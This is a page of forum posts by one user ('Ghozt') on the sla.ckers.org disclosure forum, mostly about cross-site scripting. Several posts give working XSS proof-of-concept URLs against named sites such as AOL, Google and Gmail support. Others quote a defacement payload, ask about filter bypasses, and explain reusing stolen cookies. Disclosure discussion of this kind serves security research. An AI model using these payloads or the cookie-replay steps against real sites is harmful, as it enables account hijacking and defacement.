Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 

Pages: 12345...LastNext
Current Page: 1 of 6
Results 1 - 30 of 158
7 years ago
Ghozt
Sirdarckcat: I'm guilty. I don't have a small wee, honest! - Ghozt
Forum: XSS Info
7 years ago
Ghozt
@nul: I've tested it before, no, it won't work. - Ghozt
Forum: News and Links
7 years ago
Ghozt
nktpro Wrote: ------------------------------------------------------- > Guys, > > This is the latest update from Y! Security for me. > Up to now they haven't confirmed it's totally > fixed yet: > > Just an update. We have what we think is a fix > deployed to > about one-third of our servers. We are receiving > sporadic > reports that images are not
Forum: XSS Info
7 years ago
Ghozt
Just so I don't have to start a new thread, does anyone know of an algorithm that's 40 characters long? I ran it through hashmaster and it didn't come up with anything. TestPassword - 52BF31F50EABC35D14D1D91D3DC7D0B8BB955971 - Ghozt
Forum: Projects
7 years ago
Ghozt
id, I'm still seeing "3 new". - Ghozt
Forum: Bugs
7 years ago
Ghozt
https://domains.aol.com/personaldomain/app/openRegistration?domainName=%3Cscript%3Ealert(1)%3C/script%3E - Ghozt
Forum: Full Disclosure
7 years ago
Ghozt
http://www.google.com/reviews/w/confirm?url=http%3A%2F%2F000.com%2Findex.php%3F%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&q=000&c=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26q%3D000%26btnG%3DSearch&submit=Okay%2C+please+try+this+one I just wanted to share it since most Google vulnerabilities are in the subdomains. - Ghozt
Forum: Full Disclosure
7 years ago
Ghozt
chillervalley Wrote: ------------------------------------------------------- > he looks more like an linux person Uh oh, hurry up and edit that with "BSD". :P - Ghozt
Forum: OMG Ponies
7 years ago
Ghozt
QuoteYou Bore Me...... How's the move to seattle anyway? ... - Ghozt
Forum: News and Links
7 years ago
Ghozt
</noscript><script>alert("No, that's not a good idea.")</script> - Ghozt
Forum: XSS Info
7 years ago
Ghozt
@AnDrEw: http://digg.com/security/Mozilla_Says_Ten_Fucking_Days - Ghozt
Forum: News and Links
7 years ago
Ghozt
Is it just me or does it look like she had a FuManchu removed by laser surgery? - Ghozt
Forum: News and Links
7 years ago
Ghozt
If you want it fixed overnight then contact henrit ` yahoo-inc.com Replace ` with the AT sign. - Ghozt
Forum: XSS Info
7 years ago
Ghozt
Widgets don't work like extensions do they? Can they integrate into the browser and interact with it? If they could and someone made an xpi to widet converter, I'd be in heaven. The only reason I stick with Firefox is for the extensions. - Ghozt
Forum: OMG Ponies
7 years ago
Ghozt
Oh, you must mean putting your e-mail in a post. I thought you meant that RSnake or id sold our email addresses. My bad. - Ghozt
Forum: Full Disclosure
7 years ago
Ghozt
Actually, I've never gotten any spam at the e-mail that I signed up here with. - Ghozt
Forum: Full Disclosure
7 years ago
Ghozt
I've seen two GET vulnerabilities, I was just too lazy to post them. If you want to see them, I'm sure I can easily find them again. - Ghozt
Forum: Full Disclosure
7 years ago
Ghozt
http://adbux.org/?r=%22%3Cscript%3Ealert(1)%3C/script%3E - 11 alerts.
Forum: Full Disclosure
7 years ago
Ghozt
Freewebs is your problem.
Forum: Projects
7 years ago
Ghozt
You need to create and chmod the log file.
Forum: Projects
7 years ago
Ghozt
http://mail.google.com/support/bin/static.py?query=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E%3Cnull%3D%22 Not sure who to give credit to, because I doubt the person that sent it to me found it.
Forum: Full Disclosure
7 years ago
Ghozt
It did work yesterday, fixed.
Forum: Full Disclosure
7 years ago
Ghozt
It wasn't technically XSS, just HTML injection. This is what was injected: <body onload="document.body.innerHTML='<p align=center><font size=7>Own3d by Cyber-Terrorist</font><img src=http://c2000.com/gifs/billgates.jpg><p align=center><font size=7>--Cyb3rT--</font></p>';"><noscript>" Zone-H defacement link.
Forum: News and Links
7 years ago
Ghozt
No, HTML.
Forum: News and Links
7 years ago
Ghozt
http://digg.com/microsoft/Defaced_a_Microsoft_s_web_page They injected it as a country.
Forum: News and Links
7 years ago
Ghozt
Thanks .mario, it worked.
Forum: XSS Info
7 years ago
Ghozt
CrYpTiC_MauleR Wrote: ------------------------------------------------------- > does it strip newlines or spaces too? If not then > add some spaces or newlines before and after the = > , hopefully they have some weak regex matching to > strip the SRC value out. Nope, it still gets stripped.
Forum: XSS Info
7 years ago
Ghozt
That would work except it's stripping everything after SRC=. Are there any ways to encode the "=" that would make it render?
Forum: XSS Info
7 years ago
Ghozt
I've got a possible vulnerability, it doesn't filter anything, but it does convert everything to capital letters. Is there any way around this?
Forum: XSS Info
7 years ago
Ghozt
When you have the cookie, you can use Add N Edit Cookies (Firefox), or edit the cookie file in the cookie folder (C:\Documents and Settings\<User>\Cookies) (Internet Explorer)
Forum: SQL and Code Injection
Pages: 12345...LastNext
Current Page: 1 of 6